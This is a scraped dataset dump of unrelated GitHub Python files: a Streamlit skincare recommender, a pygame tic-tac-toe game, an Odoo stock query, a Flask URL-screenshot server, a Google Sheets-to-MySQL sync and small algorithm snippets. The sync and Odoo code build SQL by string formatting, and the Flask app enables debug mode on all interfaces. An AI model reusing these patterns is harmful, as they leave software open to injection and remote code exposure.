'django.core.mail.backends.smtp.EmailBackend'\nEMAIL_HOST = 'smtp.gmail.com'\nEMAIL_HOST_PASSWORD = secure.host_password\nEMAIL_HOST_USER = secure.host_user\nEMAIL_PORT = 587\nDEFAULT_FROM_EMAIL = EMAIL_HOST_USER\n","repo_name":"ArezKhalimi/jirello","sub_path":"arez_pet/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4171,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"30481069834","text":"import pandas as pd\nimport streamlit as st\nfrom streamlit import session_state as session\nfrom PIL import Image\nimport os\nfrom recommend import recommend_table\nfrom text import show_text_elements\nimport time\n\n@st.cache_data(persist=True, show_spinner=False)\ndef load_data():\n \n df = pd.read_csv(\"sc-price.csv\")\n return df\n\ndef load_image(img):\n\tim = Image.open(os.path.join(img))\n\treturn im\n\nst.set_page_config(layout=\"wide\")\n\nimage = Image.open('img/image.png')\n\ncol1, col2 = st.columns([1, 8]) \n\nwith col1: \n st.image(image, width=100)\n\n\nwith col2: \n st.title(\"\"\"\n SISTEM REKOMENDASI SKINCARE\n \"\"\")\n\nst.text(\"\")\nst.text(\"\")\n\ntab1, tab2, tab3 = st.tabs([\"Rekomendasi\",\"Skin Type Guide\",\"Skincare Routine\"])\n\t\nwith tab1:\n\n df = load_data()\n \n st.subheader(\"\"\"\n Rekomendasi SKINCARE\n Temukan skincare yang cocok untukmu ✨\n \"\"\")\n\n st.text(\"\")\n st.text(\"\")\n st.text(\"\")\n st.text(\"\")\n\n desc = st.text_input(label=\"Deskripsikan jenis kulit dan keluhan atau tujuan memakai skincare\", max_chars=50, help=\"contoh: kulit kering berjerawat noda hitam\", label_visibility=\"visible\")\n\n st.text(\"\")\n st.text(\"\")\n\n allergen = st.radio(\n \"Apakah memiliki alergi?\",\n ('Ya', 'Tidak'))\n\n st.text(\"\")\n st.text(\"\")\n\n buffer1, col1, buffer2 = st.columns([2, 1.35, 1])\n\n is_clicked = col1.button(label=\"Rekomendasi\")\n\n st.text(\"\")\n st.text(\"\")\n st.text(\"\")\n\n if is_clicked:\n start = time.time()\n\n recommended_skincare = recommend_table(desc, allergen)\n def path_to_image_html(path):\n return ' '\n\n recommended_skincare['DESKRIPSI'] = recommended_skincare['DESKRIPSI'].str.replace('\\n', ' ')\n\n def add_row_color(row):\n if row.name < 3: # Hanya warnai 3 baris pertama\n return ['background-color: lightyellow'] * len(row)\n return [''] * len(row)\n\n if recommended_skincare.empty:\n st.error(\"No recommendations found for the given description.\")\n else:\n with st.container():\n st.title(\"Here's your recommendations\")\n st.success(\"Success in {} seconds, giving {} products\".format(time.time() - start, recommended_skincare.shape[0]))\n\n styled_table = recommended_skincare.reset_index(drop=True).style \\\n .apply(add_row_color, axis=1) \\\n .format(dict(GAMBAR=path_to_image_html))\n\n styled_table = styled_table.set_properties(subset=['DESKRIPSI'], **{'font-size': '12px'})\n\n table_html = styled_table.to_html()\n responsive_table_css = \"\"\"\n \n \"\"\"\n\n responsive_table_html = responsive_table_css + table_html\n\n st.markdown(f'{responsive_table_html}
', unsafe_allow_html=True)\n\n styled_table.to_html(\"webpage.html\", escape=False, formatters=dict(GAMBAR=path_to_image_html), index=False)\n\n st.text(\"\")\n \nwith tab2:\n st.subheader(\"\"\"\n SKIN TYPE GUIDE\n Kenali jenis kulitmu!\n \"\"\"\n )\n\n st.markdown(\"\"\"\n \n \"\"\", unsafe_allow_html=True)\n\n st.image(load_image('img/jenis_kulit.jpg'))\n\n\n result = show_text_elements()\n\n st.text(result)\n \nwith tab3:\n st.subheader(\"\"\"\n SKINCARE ROUTINE\n Rangkaian perawatan skincare untuk pagi :mostly_sunny: dan malam :crescent_moon:\n \"\"\")\n st.text(\"\")\n st.text(\"\")\n st.image(load_image('img/sc-routine.jpg'), use_column_width=True)","repo_name":"annisaaml/streamlit-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"73678277347","text":"import sys\n\nimport pygame as pg\nfrom pygame.locals import *\n\nfrom minimax_agent import Game\n\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nMAX_COLOR = (255, 136, 115, 88)\nMIN_COLOR = (117, 190, 224, 88)\nSELECTION_COLOR = (158, 255, 128, 88)\n\nSCREEN_HEIGHT = 300\nSCREEN_WIDTH = 300\n\n\ndef play_game(max_starts=True):\n pg.init()\n screen = pg.display.set_mode([SCREEN_WIDTH, SCREEN_HEIGHT])\n pg.display.set_caption('Tic Tac Toe')\n\n char_font = pg.font.SysFont('msuigothic.ttf', 175)\n end_font = pg.font.SysFont('msuigothic.ttf', 50)\n\n boxes = {\n 0: pg.Rect(2, 2, 96, 96),\n 1: pg.Rect(102, 2, 96, 96),\n 2: pg.Rect(202, 2, 96, 96),\n 3: pg.Rect(2, 102, 96, 96),\n 4: pg.Rect(102, 102, 96, 96),\n 5: pg.Rect(202, 102, 96, 96),\n 6: pg.Rect(2, 202, 96, 96),\n 7: pg.Rect(102, 202, 96, 96),\n 8: pg.Rect(202, 202, 96, 96),\n }\n\n move_list = {\n 'X': [],\n 'O': []\n }\n\n symbols = {\n 'X': char_font.render('X', True, MAX_COLOR),\n 'O': char_font.render('O', True, MIN_COLOR)\n }\n\n print(\"\\n####################\")\n print(\"Use arrow keys to select a space.\\nPress enter to commit your move.\")\n print(\"####################\")\n\n game = Game.new_game(max_starts=max_starts)\n location = 0\n\n while not game.has_ended:\n draw_board(screen, move_list, boxes, symbols, player_loc=location)\n max_turn(game, move_list)\n for event in pg.event.get():\n if event.type == KEYDOWN:\n key = event.key\n if key == K_UP:\n if location > 2:\n location -= 3\n elif key == K_DOWN:\n if location < 6:\n location += 3\n elif key == K_RIGHT:\n if location not in [2, 5, 8]:\n location += 1\n elif key == K_LEFT:\n if location not in [0, 3, 6]:\n location -= 1\n elif key == K_RETURN:\n player_input(game, move_list, location)\n elif event.type == QUIT:\n pg.quit()\n sys.exit()\n pg.display.update()\n\n while True:\n draw_board(screen, move_list, boxes, symbols, player_loc=location)\n end_screen(screen, game, end_font)\n for event in pg.event.get():\n if event.type == QUIT or event.type == KEYDOWN:\n end_game_info(game)\n pg.quit()\n sys.exit()\n pg.display.update()\n\n\ndef draw_board(screen, move_list, boxes, symbols, player_loc):\n screen.fill(BLACK)\n draw_grid(screen)\n draw_moves(boxes, move_list, screen, symbols)\n draw_player(screen, player_loc, boxes)\n\n\ndef draw_grid(screen):\n for i in range(1, 3):\n pg.draw.line(screen, WHITE, (0, SCREEN_HEIGHT*i//3), (SCREEN_WIDTH, SCREEN_HEIGHT*i//3))\n pg.draw.line(screen, WHITE, (SCREEN_WIDTH*i//3, 0), (SCREEN_WIDTH*i//3, SCREEN_HEIGHT))\n\n\ndef draw_moves(boxes, move_list, screen, symbols):\n for sign, moves in move_list.items():\n for move in moves:\n screen.blit(symbols[sign], boxes[move])\n\n\ndef draw_player(screen, player_loc, boxes):\n pg.draw.rect(screen, SELECTION_COLOR, boxes[player_loc], width=2)\n\n\ndef max_turn(game, move_list):\n if game.max_turn:\n new_move = game.do_turn()\n move_list['X'].append(new_move)\n\n\ndef player_input(game, move_list, player_loc):\n if player_loc not in move_list['X'] and player_loc not in move_list['O']:\n game.turn_input(player_loc)\n move_list['O'].append(player_loc)\n\n\ndef end_screen(screen, game, font):\n message = \"Draw!\" if game.utility(game.state) == (False, 0) else f\"{game.winner} wins!\"\n message = font.render(message, True, BLACK, SELECTION_COLOR)\n message_center = message.get_rect(center=(SCREEN_WIDTH//2, SCREEN_HEIGHT//2))\n screen.blit(message, message_center)\n\n\ndef end_game_info(game):\n message = \"Draw!\" if game.utility(game.state) == (False, 0) else f\"{game.winner} wins!\"\n print(\"\\n####################\")\n print(message)\n print(\"####################\")\n","repo_name":"caseyeaster39/5210projects","sub_path":"project-3/game_board.py","file_name":"game_board.py","file_ext":"py","file_size_in_byte":4171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9344470156","text":"from openerp import models, fields, api, exceptions\n\n\n\n\n\n\n\nclass PurchaseOrderLine(models.Model):\n _inherit = 'purchase.order.line'\n\n # STOCK IN EACH LOCATION\n @api.model\n def _compute_stock_by_location(self):\n\n # db_obj = self.pool['base.external.dbsource']\n\n res = {}\n for line in self:\n if line.product_id:\n product = line.product_id.id\n location_id = 12\n # ads = db_obj.get_stock(cr, SUPERUSER_ID, ids, product, location_id,\n # context=context)\n\n self.env.cr.execute(\"\"\" SELECT SUM(qty) AS QTY, CASE\n WHEN location_id='12' THEN 'G'\n WHEN location_id='19' THEN 'B'\n WHEN location_id='15' THEN 'P'\n END AS LOC FROM stock_quant\n WHERE (location_id ='12' OR location_id ='19' OR location_id='15')\n AND product_id = '%s' GROUP BY location_id ORDER BY location_id\"\"\" % product)\n res[line.id] = self.env.cr.dictfetchall()\n\n if not res[line.id]:\n res[line.id] = []\n else:\n # GRN\n if res[line.id][0]['loc'] == 'G':\n # res[line.id][0]['qty'] = res[line.id][0]['qty'] - ads\n res[line.id][0]['qty'] = res[line.id][0]['qty']\n counter = 0\n qty = \"\"\n qty_final = \"\"\n for location in res[line.id]:\n counter += 1\n qty += ' ' + str(res[line.id][counter - 1]['loc']) + \"=\" + str(\n res[line.id][counter - 1]['qty']) + ' '\n qty_final += qty\n\n line.stock_by_loc = qty_final\n\n stock_by_loc = fields.Char(compute=_compute_stock_by_location, string='Stocks')\n incoming = fields.Float(related='product_id.incoming_qty',string='IN')\n outgoing = fields.Float(related='product_id.outgoing_qty', string='OUT')\n\nPurchaseOrderLine()\n","repo_name":"dhecar/Motoscoot_V8","sub_path":"adaptaciones_motoscoot/models/purchase.py","file_name":"purchase.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"43860554014","text":"import os\nimport base64\nimport logging\nimport traceback\n\nfrom io import BytesIO\nfrom utils import get_original_link\nfrom capture import capture\nfrom flask import Flask, render_template, request, redirect\n\n\napp = Flask(__name__)\n\n\nlogging.basicConfig(level=logging.DEBUG)\nLOGGER = logging.getLogger(__name__)\n\n\n@app.route('/')\ndef index():\n return render_template('index.html', result='', image=None, error=None)\n\n@app.route('/search', methods=['POST'])\ndef search():\n url = request.form['url']\n try:\n original_url = get_original_link(url)\n image = capture(original_url)\n buf = BytesIO()\n image.save(buf, format='png')\n image_str = base64.b64encode(buf.getvalue()).decode('utf-8')\n error = None\n result = original_url\n except Exception as e:\n LOGGER.error(traceback.format_exc())\n image_str = None\n error = str(e)\n result = None\n\n return render_template('index.html', error=error, result=result, image=image_str)\n\nif __name__ == '__main__':\n app.debug = True\n app.run(host='0.0.0.0')\n","repo_name":"takuseno/nsg","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"36075823289","text":"import heapq\n\nclass Solution:\n def minMeetingRooms(self, intervals: List[List[int]]) -> int:\n intervals.sort(key=lambda x: x[0]) #sort by start times\n \n rooms = [] #represents rooms\n \n heapq.heappush(rooms, intervals[0][1]) #allocate first meeting to room\n \n for i in range(1, len(intervals)):\n \n #if start time of meeting is after the end-time of meeting with least time, remove existing meeting\n if intervals[i][0] >= rooms[0]:\n heapq.heappop(rooms)\n \n #allocating meeting room\n heapq.heappush(rooms, intervals[i][1])\n \n return len(rooms)\n ","repo_name":"ggopalai/leetcode-python","sub_path":"ds/heaps/meeting_rooms_2.py","file_name":"meeting_rooms_2.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"15434993149","text":"from django import template\nfrom markdown import markdown\nfrom django.utils.safestring import mark_safe\nfrom bs4 import BeautifulSoup\n\nfrom pygments import highlight\nfrom pygments.lexers import get_lexer_by_name\nfrom pygments.formatters import HtmlFormatter\nfrom pygments.styles import get_style_by_name\n\n\nregister = template.Library()\n\n@register.filter\ndef toc(text):\n\n html = markdown(text, extensions = ['markdown.extensions.tables', 'markdown.extensions.fenced_code', 'toc'])\n\n # Parse the HTML with BeautifulSoup\n soup = BeautifulSoup(html, 'html.parser')\n\n # Find all the headings in the HTML\n headings = soup.find_all(['h1', 'h2', 'h3', 'h4', 'h5', 'h6'])\n\n # Create a table of contents\n toc_html = ''\n for heading in headings:\n # Get the text and ID of the heading\n heading_text = heading.text.strip()\n heading_id = heading.get('id')\n\n # Add the heading to the table of contents\n toc_html += f'{heading_text} '\n\n # Add the ID to the heading if it doesn't already have one\n if not heading_id:\n heading['id'] = heading_text.replace(' ', '-').lower()\n\n toc_html += ' '\n\n return mark_safe(toc_html)\n\n\n@register.filter\ndef markdownify(text):\n\n html = markdown(text, extensions = ['markdown.extensions.tables', 'markdown.extensions.fenced_code', 'toc'])\n\n # Parse the HTML with BeautifulSoup\n soup = BeautifulSoup(html, 'html.parser')\n \n return mark_safe(str(soup))","repo_name":"Qabudhaim/Obscurus","sub_path":"Portal/Notes/templatetags/markdown_tags.py","file_name":"markdown_tags.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72184018467","text":"from lps import computeLPSArray\ndef KMPSearch(pat, text, mydict):\n\n M = len(pat)\n N = len(text)\n\n p = 0\n lps = [0]*M\n j = 0 \n \n\n computeLPSArray(pat, M, lps)\n \n i = 0\n while i < N:\n if pat[j] == text[i].lower():\n i += 1\n j += 1\n \n if j == M:\n p += 1\n j = lps[j-1]\n \n\n elif i < N and pat[j] != text[i]:\n\n if j != 0:\n j = lps[j-1]\n else:\n i += 1 \n mydict.update({pat:p})\n","repo_name":"AbhishekVerma023/Search-Engine","sub_path":"kmp.py","file_name":"kmp.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"20284444606","text":"import pymysql\nfrom apiclient.discovery import build\nfrom httplib2 import Http\nfrom oauth2client import client\nfrom oauth2client import file as oauth_file\nfrom oauth2client import tools\n\n\n__version__ = '1.0.0'\n__author__ = 'mingrammer'\n__license__ = 'MIT'\n\n\nclass Sheet2db(object):\n\n SCOPES = 'https://www.googleapis.com/auth/spreadsheets.readonly'\n\n def __init__(self, api_key=None, creds_path='credentials.json', token_path='token.json'):\n \"\"\"\n Args:\n api_key: Google API key which is accessible to spreadsheet API.\n Service will be built with api key if and only if this value has set.\n credentials_path: File path where Google API credentials is stored.\n token_storage_path: File path to store the credential in.\n \"\"\"\n if api_key:\n self.service = self._build_with_api_key(api_key)\n else:\n self.service = self._build_with_oauth_token(creds_path, token_path)\n self.cols = tuple()\n self.rows = list(tuple())\n\n def _build_with_api_key(self, api_key):\n service = build('sheets', 'v4', developerKey=api_key)\n return service\n\n def _build_with_oauth_token(self, credentials_path, token_storage_path):\n store = oauth_file.Storage(token_storage_path)\n creds = store.get()\n if not creds or creds.invalid:\n flow = client.flow_from_clientsecrets(\n credentials_path, self.SCOPES)\n creds = tools.run_flow(flow, store)\n service = build('sheets', 'v4', http=creds.authorize(Http()))\n return service\n\n def _quote(self, a_tuple):\n return tuple('\\'{}\\''.format(e) for e in a_tuple)\n\n def _back_quote(self, a_tuple):\n return tuple('`{}`'.format(e) for e in a_tuple)\n\n def fetch(self, sheet, tab, range):\n \"\"\"\n Fetch and store data from Google spreadsheet.\n\n Args:\n sheet: Sheet id to fetch from.\n tab: Tab name to fetch from.\n range: Cell range to fetch.\n Range must include a row will be used as database cols.\n\n Returns:\n None.\n \"\"\"\n range_name = u\"'{}'!{}\".format(tab, range)\n result = self.service.spreadsheets().values().get(\n spreadsheetId=sheet, range=range_name).execute()\n values = result.get('values', [])\n if len(values) > 1:\n self.cols = tuple(values[0])\n self.rows = [tuple(row) for row in values[1:]]\n\n def sync(self, host, port, user, password, db, table):\n \"\"\"\n Sync to database.\n\n Args:\n host: DB host.\n port: DB port.\n user: DB username.\n password: DB password.\n db: Target db sync to.\n table: Target table sync to.\n\n Returns:\n None.\n \"\"\"\n conn = pymysql.connect(\n host=host,\n port=port,\n user=user,\n passwd=password,\n db=db,\n charset='utf8',\n use_unicode=True)\n with conn.cursor() as cur:\n back_quoted_cols = self._back_quote(self.cols)\n for row in self.rows:\n quoted_row = self._quote(row)\n query = u'REPLACE INTO {}({}) VALUES ({})'.format(\n table,\n ','.join(back_quoted_cols),\n ','.join(quoted_row))\n cur.execute(query)\n conn.commit()\n","repo_name":"mingrammer/sheet2db","sub_path":"sheet2db/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3484,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"70"}
+{"seq_id":"40430088558","text":"from libkrampouezh import libinterpol\nfrom libkrampouezh import naive_tree\nimport sys\nimport argparse\n\n\ndef main(args=sys.argv[1:]):\n out_formats=('pgf', 'geogebra', 'latex', 'gui')\n # The usual argparse recipe\n parser = argparse.ArgumentParser(description=\"A 1D interpoler with convenient output formats.\")\n parser.add_argument('-t', '--format', choices=out_formats, default=out_formats[0],\n\t\t\thelp='Output format (default: %(default)s)')\n sub = parser.add_subparsers()\n \n cubic = sub.add_parser('cubic', help='Interpolation using natural cubic splines.')\n cubic.add_argument('points', nargs='+', help='The points to interpol in the format `(x,y)`. At least 3.')\n cubic.set_defaults(interpol=libinterpol.cubic_coefs)\n \n hermite = sub.add_parser('hermite', help='Interpolation using cubic Hermite splines.')\n hermite.add_argument('points', nargs='+', help=\"The points to interpol in the format `(x,y,y')`. At least 2.\")\n hermite.set_defaults(interpol=libinterpol.hermite_coefs)\n \n args = parser.parse_args(args)\n # args.points = ('(1,2,3)', '(2,7,1)') so s[1:-1].split(',') is '1,2,3'.split(',')…\n points = tuple(tuple(float(f) for f in s[1:-1].split(',')) for s in args.points)\n if args.format == 'gui':\n libinterpol.plot_interpol(tuple(p[:2] for p in points))\n else:\n out = getattr(naive_tree.piecewise_polynomial(naive_tree.Variable(), args.interpol(points), (p[0] for p in points)).simplify(), args.format)()\n print(out)\n \nif __name__=='__main__':\n sys.exit(main(sys.argv[1:]))\n","repo_name":"LoicGrobol/krampouezh","sub_path":"krampouezh.py","file_name":"krampouezh.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"11206229910","text":"import csv\nimport json\n\ndef int_from_str(s):\n try:\n return int(s)\n except Exception:\n return None\n\nsites = []\nfor line in csv.reader(open('top.csv')):\n rank = int_from_str(line[0])\n if rank is not None:\n sites.append({\"rank\": rank, \"url\": \"http://\" + line[1], \"category\": line[3]})\n\nopen('top.json', 'w').write(json.dumps({\"sites\": sites}))\n\n\n","repo_name":"nate-parrott/fast-news","sub_path":"topsites/json_from_top_csv.py","file_name":"json_from_top_csv.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"70870196707","text":"import os\nimport numpy\nimport matplotlib.pyplot as plt\nimport importlib.machinery\nimport types\nimport pdb\nimport pickle\nfrom scipy.interpolate import interp1d\nfrom util import get_subject_from_session,get_frame_channel,get_orientation_tuning_stepname\n \ndef print_session_steps_and_details(location):\n # create lists\n for sess in os.listdir(location):\n print(sess) \n with open(os.path.join(location,sess,'spike_and_trials.pickle'),'rb') as f:\n data = pickle.load(f)\n step_names = numpy.asarray(data['trial_records']['step_name'])\n durations = numpy.asarray(data['trial_records']['max_duration'])\n contrasts = numpy.asarray(data['trial_records']['contrast'])\n try:\n if not step_names: pdb.set_trace()\n except ValueError:\n pass\n \n for step_name in numpy.unique(step_names):\n durations_that_step = durations[step_names==step_name]\n contrasts_that_step = contrasts[step_names==step_name]\n print('\\t',step_name,':',numpy.unique(durations_that_step),'\\t\\t',numpy.unique(contrasts_that_step))\n\ndef get_event_channels_in_session(location):\n for sess in os.listdir(location):\n print(sess)\n with open(os.path.join(location,sess,'spike_and_trials.pickle'),'rb') as f:\n data = pickle.load(f)\n trial_duations = (numpy.asarray(data['trial_records']['trial_end_index'])-numpy.asarray(data['trial_records']['trial_start_index']))/30000\n durations = numpy.asarray(data['trial_records']['max_duration'])*1./60.\n ttl_events = data['trial_records']['events']['ttl_events']\n \n ttl_iter = iter(ttl_events.items())\n k,val = next(ttl_iter)\n for k in val.keys():\n print('\\tChannel:',k,'\\t',numpy.size(numpy.unique(val[k]['falling'])))\n\ndef load_spike_and_trials_for_one_session(session):\n with open(os.path.join(session,'spike_and_trials.pickle'),'rb') as f:\n data = pickle.load(f)\n pdb.set_trace()\n\nif __name__==\"__main__\":\n location = r'C:\\Users\\bsriram\\Desktop\\Data_V1Paper\\DetailsProcessedBehaved'\n print_session_steps_and_details(location)\n # for sess in os.listdir(location):\n # print(sess,get_orientation_tuning_stepname(sess))\n # load_spike_and_trials_for_one_session(location)\n \n \n \n","repo_name":"balajisriram/v1-paper-analysis","sub_path":"Util/GetStepNamesForSession.py","file_name":"GetStepNamesForSession.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"11565218413","text":"class Moon:\n\n def __init__(self, name, planet, orbital_period, mean_radius, image, description, id = None):\n self.name = name\n self.planet = planet\n self.orbital_period = orbital_period\n self.mean_radius = mean_radius\n self.image = image\n self.description = description\n self.id = id","repo_name":"WaxenOsprey/SolarSystem.DB","sub_path":"models/moon.py","file_name":"moon.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"73443878625","text":"import numpy as np\n\nprint(\"Hello World\")\n\n\ndef rot_matrix(matrix, degree):\n global rotm\n\n winkel = np.radians(degree)\n\n c, s = np.cos(winkel), np.sin(winkel)\n rotm = np.matrix([ [1,0,0],[0,c,-s],[0,s,c] ])\n\n print(rotm)\n return np.matmul(rotm, matrix)\n\ndef matrix():\n m1 = np.matrix([[1,0,0,0], [0,1,0,0], [0,0,1,0], [0,0,0,1]])\n m2 = np.matrix('1 0 0 0; 0 1 0 0; 0 0 1 0; 0 0 0 1')\n \n e2 = np.matrix('1 0; 0 1')\n e3 = np.matrix('1;1;1')\n\n print(e3)\n print(\"\\n\")\n\n rot = rot_matrix(e3, -90)\n\n print(rot)\n print(rot[2].item())\n\ndef mat_mult():\n m1 = np.matrix('3 2 1; 1 0 2')\n m2 = np.matrix('1 2; 0 1; 4 0')\n\n result = np.matmul(m1, m2)\n\n print(result)\n\nmatrix()","repo_name":"EE-modders/CEM-tool","sub_path":"src/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"70"}
+{"seq_id":"22596771221","text":"from django.urls import reverse\n\nfrom nautobot.tenancy.models import Tenant, TenantGroup\nfrom nautobot.utilities.testing import APITestCase, APIViewTestCases\n\n\nclass AppTest(APITestCase):\n def test_root(self):\n\n url = reverse(\"tenancy-api:api-root\")\n response = self.client.get(f\"{url}?format=api\", **self.header)\n\n self.assertEqual(response.status_code, 200)\n\n\nclass TenantGroupTest(APIViewTestCases.APIViewTestCase):\n model = TenantGroup\n brief_fields = [\"_depth\", \"display\", \"id\", \"name\", \"slug\", \"tenant_count\", \"url\"]\n bulk_update_data = {\n \"description\": \"New description\",\n }\n slug_source = \"name\"\n\n @classmethod\n def setUpTestData(cls):\n\n parent_tenant_groups = (\n TenantGroup.objects.create(name=\"Parent Tenant Group 1\", slug=\"parent-tenant-group-1\"),\n TenantGroup.objects.create(name=\"Parent Tenant Group 2\", slug=\"parent-tenant-group-2\"),\n )\n\n TenantGroup.objects.create(name=\"Tenant Group 1\", slug=\"tenant-group-1\", parent=parent_tenant_groups[0])\n TenantGroup.objects.create(name=\"Tenant Group 2\", slug=\"tenant-group-2\", parent=parent_tenant_groups[0])\n TenantGroup.objects.create(name=\"Tenant Group 3\", slug=\"tenant-group-3\", parent=parent_tenant_groups[0])\n\n cls.create_data = [\n {\n \"name\": \"Tenant Group 4\",\n \"slug\": \"tenant-group-4\",\n \"parent\": parent_tenant_groups[1].pk,\n },\n {\n \"name\": \"Tenant Group 5\",\n \"slug\": \"tenant-group-5\",\n \"parent\": parent_tenant_groups[1].pk,\n },\n {\n \"name\": \"Tenant Group 6\",\n \"slug\": \"tenant-group-6\",\n \"parent\": parent_tenant_groups[1].pk,\n },\n {\n \"name\": \"Tenant Group 7\",\n \"parent\": parent_tenant_groups[1].pk,\n },\n ]\n\n\nclass TenantTest(APIViewTestCases.APIViewTestCase):\n model = Tenant\n brief_fields = [\"display\", \"id\", \"name\", \"slug\", \"url\"]\n bulk_update_data = {\n \"description\": \"New description\",\n }\n slug_source = \"name\"\n\n @classmethod\n def setUpTestData(cls):\n\n tenant_groups = (\n TenantGroup.objects.create(name=\"Tenant Group 1\", slug=\"tenant-group-1\"),\n TenantGroup.objects.create(name=\"Tenant Group 2\", slug=\"tenant-group-2\"),\n )\n\n Tenant.objects.create(name=\"Tenant 1\", slug=\"tenant-1\", group=tenant_groups[0])\n Tenant.objects.create(name=\"Tenant 2\", slug=\"tenant-2\", group=tenant_groups[0])\n Tenant.objects.create(name=\"Tenant 3\", slug=\"tenant-3\", group=tenant_groups[0])\n\n cls.create_data = [\n {\n \"name\": \"Tenant 4\",\n \"slug\": \"tenant-4\",\n \"group\": tenant_groups[1].pk,\n },\n {\n \"name\": \"Tenant 5\",\n \"slug\": \"tenant-5\",\n \"group\": tenant_groups[1].pk,\n },\n {\n \"name\": \"Tenant 6\",\n \"slug\": \"tenant-6\",\n \"group\": tenant_groups[1].pk,\n },\n {\n \"name\": \"Tenant 7\",\n \"group\": tenant_groups[1].pk,\n },\n ]\n","repo_name":"uthapa82/nautobot-plugin-ixia","sub_path":"nautobot/tenancy/tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"40007373890","text":"import bpy\nimport os, sys\n\nfrom Sun_Power.utils import *\n\n\ndef test_calc_power_lost():\n S = 120\n S_house = 120\n S_floor = 55\n radius = 4\n temp_in_start = 20\n temp_out = -15\n dT = 35\n Kt = 0.04\n N_lost_el = calc_power_lost_heat_el(S, dT, Kt)\n \n N_lost = get_power_lost(S_house, S_floor, radius, temp_in_start, temp_out)\n print(N_lost_el)\n print(N_lost)\n \n \ntest_calc_power_lost()\n","repo_name":"yaricp/Sun_Power","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"23258882441","text":"from classifier import single_predictor\nfrom utils import load_data, get_inputs, get_results, NMS, squarify, drawOutputs\nimport time\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\ndims = [\n 343, #topX\n 106, #topY\n 247, #width\n 146 #height\n]\n\nmodel = single_predictor(\"lenet_background_aug\")\n\nimage = cv2.imread(\"c:\\\\Users\\\\AaronPeng\\\\desktop\\\\prsef\\\\sliding_window\\\\imgs\\\\road.png\",0)\n\nchunk = image[dims[1]:dims[1]+dims[3],dims[0]:dims[0]+dims[2]]\n\nplt.imshow(chunk,cmap='gray')\nplt.show()\n\ntestImg = np.expand_dims(cv2.resize(chunk,(32,32)),0)/255\n\nprint(testImg.shape)\n\nprint(model.predictor.predict([testImg]))","repo_name":"Peng-AP/prsef","sub_path":"sliding_window/modelTest.py","file_name":"modelTest.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"611250653","text":"import numpy as np\nN = 1000 #number of users\nM = 200 #number of observations (sequence length)\nK = 80 #number of active users\nJ = 1 #number of antennas\nL = 100000 #number of monte carlo averaging \nepsilon = K/N #activity ratio \nomega = N/M #overload ratio\nitermax = 20 #number of iterations for MMV-AMP\nSNR = 10 #SNR\n\nsig2 = 1.0/M * 1.0/np.power(10.0,SNR/10.0) #noise variance\ntau2 = sig2 + omega * epsilon\n\nfor t in range(itermax): #iteration count\n x = np.sqrt(0.5)*np.sqrt(tau2)*(np.random.normal(size=(L,1)) + np.random.normal(size=(L,1)) * 1j)\n Km = (int)(L/N * K)\n x[0:Km] += np.sqrt(0.5)*(np.random.normal(size=(Km,1)) + np.random.normal(size=(Km,1)) * 1j) \n\n psi=np.log(1.0 + 1.0/tau2)\n pit= 1/J * (1.0/tau2 - 1.0/(1.0+tau2)) * np.power(np.abs(x),2)\n phi = 1.0/(1.0 + (1.0-epsilon)/epsilon * np.exp(-1 * (pit - psi)))\n tmp = phi * (1-phi) * 1/np.power(1+tau2,2) * np.power(np.abs(x),2)\n theta = tmp.mean() * 1/J\n tau2 = sig2 + omega*epsilon*tau2/(1+tau2) + omega*theta\n print(t, tau2)\n\n\n ","repo_name":"54isb/GFNOMA-Tutorial","sub_path":"SE.py","file_name":"SE.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"70"}
